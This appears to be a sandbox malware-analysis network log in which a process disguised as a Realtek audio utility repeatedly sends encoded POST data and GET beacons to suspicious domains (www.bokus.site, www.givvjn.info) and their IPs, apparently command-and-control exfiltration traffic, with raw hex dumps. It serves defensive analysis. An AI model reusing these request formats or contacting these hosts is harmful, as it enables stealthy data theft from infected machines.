Jan 13, 2025 10:21:53.930924892 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:21:53 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49780	199.192.21.169	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:56.437421083 CET	813	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 61 62 77 41 75 6b 31 72 62 64 49 41 7a 2f 5a 35 7a 51 7a 49 3d Data Ascii: AuPF3v=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEEabwAuk1rbdIAz/Z5zQzI=
Jan 13, 2025 10:21:56.614742994 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:21:56 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49781	199.192.21.169	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:21:59.124716997 CET	7962	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 68 37 56 64 34 65 44 46 72 37 31 38 33 72 45 74 4b 75 57 34 41 33 48 31 6e 70 66 62 74 62 59 32 74 68 74 65 6c 30 38 48 64 49 59 52 50 44 66 34 34 47 37 66 4c 70 2b 7a 32 59 66 62 77 67 46 39 41 76 4f 44 2b 41 49 37 4c 5a 37 54 47 42 4f 69 44 34 61 53 4e 4e 4a 43 39 2b 54 54 4c 68 6a 38 4a 34 47 56 4e 32 55 74 75 74 44 38 4b 78 48 4b 52 4e 33 4b 78 45 63 48 62 67 65 69 32 2b 33 62 4c 50 79 50 48 38 50 57 62 4e 4b 46 6c 59 38 30 5a 6f 65 42 42 4e 62 54 77 34 71 68 73 6e 69 53 37 74 38 33 73 41 34 45 6d 50 4a 54 53 31 76 4d 63 58 6a 6a 78 69 72 76 68 38 45 62 6b 72 51 6f 39 71 [TRUNCATED] Data Ascii: AuPF3v=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSjtq1m9jwkZ2mhsW82AiEgvyM8OSogBOzgajotcwZ1+SHZPsFNWJZ07Llzi4Ba2ZMfk7UX3Jekb0rOkIeVoY125jnI4U8/a+h7Vd4eDFr7183rEtKuW4A3H1npfbtbY2thtel08HdIYRPDf44G7fLp+z2YfbwgF9AvOD+AI7LZ7TGBOiD4aSNNJC9+TTLhj8J4GVN2UtutD8KxHKRN3KxEcHbgei2+3bLPyPH8PWbNKFlY80ZoeBBNbTw4qhsniS7t83sA4EmPJTS1vMcXjjxirvh8EbkrQo9q5izW026YBV+a0eZTa5Gs4rwJ6Fl0UACMH0Dxw/Mo14s26X9Wvlq2w9L7kbvLEfaA9vELxYMKGHFX9VBnF0Y/rasbCSYe7NGYCzWbjOoOZiSIUgmYCXTUMec7Akv0IObf7p00fvMw084JAUjGjYA3+riLnwkO0kcaDekzygDHv6O5JtKIAq2vGtqYLGoyKLfqyu5E2qxqgOdpw10+X8BiG4OSeZZ1oLHMnCss21407VRW2+xGpvaIiWWuA+OIMeph4TiMETcMgXQtB9WxJvpzaotAi86271PilkISdxdBsBEg8cp69KMK9qghrB66gWLyp6+Ou9PEq8FZt1odZbYyjuFMCqGkPiFI0+j6dzyFt1rcJVPKwN+mPYlbJPwrGG1mh78QBnBXwksRWvX64Evq4akbAxx+K/KxhfjoevXYbLZ/0B2EpcdXh2zfi0Bi+0sRRp7J2YVojieH8H86+fqcIqqH6i0KFGuZ5BJgYuFFqr6XyJfU49ZwNPKfXtBakHFytUH5lZs1rqHtEObtOMAu/zTHMVWVa0ogY+7WI+k0VZq2Rh+I9pjLxOu48XR+sK++jKEcRxCCDzVlZ7Q/Thp7ENniqFFfapUoDeymYvYaumZogC33wF/tqwFvt9BkQDGtGvwVuqohEQ1V+I9ajsgYjpqG8o/a5qVAWY [TRUNCATED]
Jan 13, 2025 10:21:59.309046984 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:21:59 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49782	199.192.21.169	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:01.810759068 CET	528	OUT	GET /qps0/?AuPF3v=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&v1GdZ=vUN3 HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:22:01.991018057 CET	933	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:22:01 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49783	47.83.1.90	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:15.866168976 CET	796	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 36 74 45 4b 62 36 65 41 75 4f 71 6d 4c 42 72 6e 63 57 42 4e 41 3d 3d Data Ascii: AuPF3v=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ6tEKb6eAuOqmLBrncWBNA==
Jan 13, 2025 10:22:16.862235069 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:22:16 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49784	47.83.1.90	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:18.710575104 CET	816	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 64 46 41 48 36 4d 63 6a 38 68 46 52 67 4c 4c 46 4e 32 68 55 3d Data Ascii: AuPF3v=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYdFAH6Mcj8hFRgLLFN2hU=
Jan 13, 2025 10:22:19.704684973 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:22:19 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	49785	47.83.1.90	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:21.559335947 CET	2578	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 43 75 4d 75 7a 53 42 7a 72 78 49 4d 4c 42 4d 46 59 66 74 6b 34 32 35 62 4e 73 44 71 76 4f 69 72 72 6b 49 4e 61 42 71 48 39 48 73 57 65 36 62 2f 34 73 37 7a 74 33 79 4e 47 68 6a 55 53 58 42 54 36 66 4c 75 48 56 33 62 4f 70 61 76 68 30 68 53 55 63 39 4c 4e 51 59 42 62 46 58 4b 4f 65 5a 64 46 32 48 76 73 5a 78 67 44 76 4e 62 2b 4e 41 55 33 4e 64 51 38 30 55 49 63 6c 37 4f 73 72 73 73 74 5a 49 5a 62 6f 51 6b 37 68 52 51 46 66 71 37 31 53 47 4f 34 74 52 47 70 59 72 34 41 41 76 4a 59 42 37 6b 45 4c 74 4c 52 66 38 73 63 2f 58 4b 7a 50 4a 67 55 32 63 52 43 49 30 48 6c 56 6c 64 6f 4b [TRUNCATED] Data Ascii: AuPF3v=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYIpCDKLvU2+xakr9dgSlpJyNbA4k1TLuyZajI8XBO+YONvIccrB7zIomDEMvOgAHtD8DXqZTALsK7L+gOPm7DoY38groXYs1CuMuzSBzrxIMLBMFYftk425bNsDqvOirrkINaBqH9HsWe6b/4s7zt3yNGhjUSXBT6fLuHV3bOpavh0hSUc9LNQYBbFXKOeZdF2HvsZxgDvNb+NAU3NdQ80UIcl7OsrsstZIZboQk7hRQFfq71SGO4tRGpYr4AAvJYB7kELtLRf8sc/XKzPJgU2cRCI0HlVldoKYvJCtlS7eWmt6rdghCkHY8hWAO4inU3/up73InoWYO1ZzU+wqvmDpkbQoRPPgKKzA/R2QqpCgxC8k6PWIr6GaZjmEjPhwRWlJt5JuoCrKcEpG6E1S4QxFCJvR9eYcvksT2G9m0zhhbkeYwm4faEMMMWchO1RKXRaGVfFomGfn6KgdUHFnQ3fnT+ZXl3JGwacKEQpzerZp+HrTvTz/U5qWVZA2LzbaUR8gHzeQnEWY430fZ0x+s1TirXALCgy2udthlheVtPTzz7z1lezsxt6UZsXlbQVTNJ5Q+B2eh3Jhi/rgCJVOE4slw9vew3dB/ZHtZn/7z+p1hdSn0oCJ4bMgDqh3Bzz2GWSQaYfducim0oFunMSBJs3IDRwYtUQTSmLmsR+C73u4trTk9BMwkdoW6J0A2PdOHT5q6qYHW5YJQ1p0FsQ2jVNNmaTNdIjVECmxlrwBqER1dS+tGtaqSXWeSu6UEP0VEvcVYt9oJWoDJQieVA24aiehWmTjRW/bVvZsjAzLWT3mI3U4Gimd2yINu82cVe45mqtIUBTDRGugBbJTR11wYsdI1YTWNnqLa5VI4QC+c3UCeyzy19RfDTl3Ooix/Ls5WI7J/+8r0z3o+Hmaa/s7hgUQpiZ2uH9ZPd6P9DVz/A8eovQ0AE4e63FNkxtIc+qXaDDe7 [TRUNCATED]
Jan 13, 2025 10:22:21.559434891 CET	5387	OUT	Data Raw: 62 64 6e 76 78 31 43 43 35 43 4c 59 30 53 66 4b 75 38 6f 49 72 6e 6d 35 32 36 59 70 4f 58 43 44 32 36 36 59 33 31 4d 35 70 51 42 4e 79 4c 77 50 6e 56 5a 61 68 56 4b 35 6e 65 4a 73 63 77 47 4b 54 50 61 6b 61 4a 35 41 65 54 6a 64 67 4a 49 57 64 45 Data Ascii: bdnvx1CC5CLY0SfKu8oIrnm526YpOXCD266Y31M5pQBNyLwPnVZahVK5neJscwGKTPakaJ5AeTjdgJIWdEV23RLIDCVcroa9Ny/AEEt42oOcxCZuEZo4aX0BNRSHBByKWCDNZLG0CaxFBXO1FfpYjyV7gJBssljeqMgirhxwwvWLyQORtnarNab21QtoDfj2V0oYqFGBY0Baiw7KtowndhyNXrFs3RIonc4I+x7556bZQ3AvTCt
Jan 13, 2025 10:22:22.561311007 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:22:22 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	49786	47.83.1.90	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:24.411524057 CET	529	OUT	GET /nkmx/?AuPF3v=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&v1GdZ=vUN3 HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:22:25.411010027 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:22:25 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.20	49787	13.248.169.48	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
